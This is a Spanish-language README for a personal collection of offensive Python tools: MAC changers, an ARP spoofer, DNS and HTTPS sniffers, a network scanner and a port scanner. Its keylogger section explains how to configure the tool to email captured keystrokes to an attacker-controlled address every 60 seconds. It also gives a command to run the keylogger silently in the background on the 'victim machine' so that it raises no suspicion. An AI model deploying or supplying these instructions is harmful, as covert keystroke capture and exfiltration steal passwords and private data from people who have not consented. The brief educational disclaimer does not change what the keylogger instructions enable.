Mis herramientas desarrolladas en Python para pruebas de seguridad ofensiva.
Aviso: Todas las herramientas están destinadas exclusivamente a fines educativos y a su utilización en entornos propios o con autorización explícita.
Cada carpeta contiene su respectivos "requirements.txt". Para instalarlos ejecute el siguiente comando:
pip install -r requirements.txtPermiten modificar la dirección MAC de una interfaz de red.
Cambia la dirección MAC por una especificada manualmente por el usuario.
Ejemplo:
python3 MacChanger_spec.py -i eth0 -m 00:11:22:33:44:55Genera y asigna automáticamente una dirección MAC aleatoria. Solo es necesario indicar la interfaz de red.
Ejemplo:
python3 MacChanger_random.py -i eth0Estas herramientas están diseñadas para utilizarse en conjunto.
Realiza un ataque de ARP Spoofing (Man-in-the-Middle), redirigiendo el tráfico entre los dispositivos de la red.
Mientras esta herramienta se encuentra en ejecución, es posible utilizar los sniffers para inspeccionar la información que circula por la red.
Para esta herramienta es necesario tener la direccion MAC asignada a: "aa:bb:cc:44:55:66", de lo contrario el programa no funcionara correctamente.
Ejemplo:
python3 ARP_spoofer.py -t 192.168.100.1Captura y muestra las consultas DNS realizadas por los equipos de la red. Simplemente ejecutalo y el script hara todo.
Se requiere control previo del dispositivo a analizar para asi descargar certificaciones de MITMProxy y tener su proxy configurado. (Para la ejecucion de este script es necesario tener instalado MITMProxy por fuera de python)
mitmproxy/mitmdump -s HTTPS_sniffer.py --quietEscanea un rango de direcciones IP para identificar los hosts activos dentro de una red.
Ejemplo:
python3 Red_scanner.py -t 192.168.100.1-255Resultado:
- Escaneará las direcciones desde
192.168.100.1hasta192.168.100.255e identificará los dispositivos activos.
Escanea los puertos abiertos de un host.
Escanear todos los puertos:
python3 Port_scan.py -t 192.168.100.10 -p 1-65535Escanear puertos específicos:
python3 Port_scan.py -t 192.168.100.10 -p 22,80Resultado:
- Verifica si los puertos indicados se encuentran abiertos en el host objetivo.
En la carpeta de "Keylogger" se encuentra el archivo "main.py". Si descargamos la carpetae instalamos los requerimientos en la maquina victima se enviara un correo cada 60 segundos (modificable manualmente) al receptor asignado.
self.send_email("Keylogger Actualizacion", email_body, "tucorreo@gmail.com(Emisor)", ["tucorreo@gmail.com (receptor, puedes ser tu mismo)"], "APP_KEY", )En la linea de codigo que se muestra arriba se tiene que poner su correo desde el cual se enviaran las actualizaciones del keylogger y el correo receptor. En la "APP_KEY" se ingresa la contraseña creada desde la app del gestor de google.
Una vez configurado todo, se ejecuta en segundo plano en la maquina victima para que no levante ningun tipo de sospecha de la siguiente manera:
python3 main.py &>/dev/null & disown - Python 3.x
- Privilegios de administrador/root para aquellas herramientas que interactúan directamente con interfaces de red.